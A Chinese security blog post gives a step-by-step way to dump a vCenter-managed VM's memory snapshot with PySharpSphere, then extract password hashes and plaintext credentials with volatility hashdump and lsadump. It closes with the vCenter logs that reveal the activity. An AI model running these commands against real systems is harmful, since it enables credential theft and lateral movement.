type
Post
status
Published
date
Dec 9, 2022
slug
summary
tags
攻防
业务安全
category
技术分享
icon
password
Property
Dec 15, 2022 01:58 AM
场景:当我们已知部署了vCenter的机器,并且我们得到平台的账号密码,我们接下来可以尝试拿下vCenter中所管理的虚拟机,以扩大攻击成果。比如,我们可以抓个机器的hash,但是遇到锁屏的机器除了尝试登录以外该怎么下手呢?
前提:在exsi下创建了虚拟机,并受vcenter管理
第一步:dump快照
使用pysharpsphere或sharpsphere对指定目标机器拍摄快照,然后dump镜像到本地
PySharpSphere
RicterZ • Updated Oct 15, 2024
#dump取MoID为VM-21的机器镜像到本地,此过程需要时间 python.exe main.py -H 192.168.5.175 -u administrator@vsphere.local -p "password" dump -t vm-21
VM MoID可以在这里取
脚本利用过程,它会根据提供的MoID机器去寻找当前镜像是否存在快照,若没有的话则会先去创建一个新的快照,通过快照dump取.vmsn和.vmem文件到本地
第二步:read内存
利用volatility读取内存
以下命令用于换取镜像信息,—profile参数可通过—info根据被打快照虚拟机版本进行配置
volatility_2.6_win64_standalone.exe -f aa-Snapshot1.vmem imageinfo
以下命令用于抓取哈希
volatility_2.6_win64_standalone.exe -f aa-Snapshot1.vmem --profile=Win2012R2x64 hashdump
以下命令用于抓取明文密码
volatility_2.6_win64_standalone.exe -f aa-Snapshot1.vmem --profile=Win2012R2x64 lsadump
发现
通过日志文件C:\ProgramData\VMware\vCenterServer\logs\vmware-vpx\vpxd.log(vcenter的主日志,主要记录vcenter连接通信,内部任务和事件等)可以看到工具已通过请求去获取快照内存文件
另外通过日志文件C:\ProgramData\VMware\vCenterServer\logs\vpxd-svcs\vpxd-svcs.log发现用户会话的登录和注销过程
- Author:w1nk1
- URL:https://notion-w1nk1.vercel.app//article/418e4fa2-8eb5-461b-8d68-23c3f5f87ed1
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!
Relate Posts
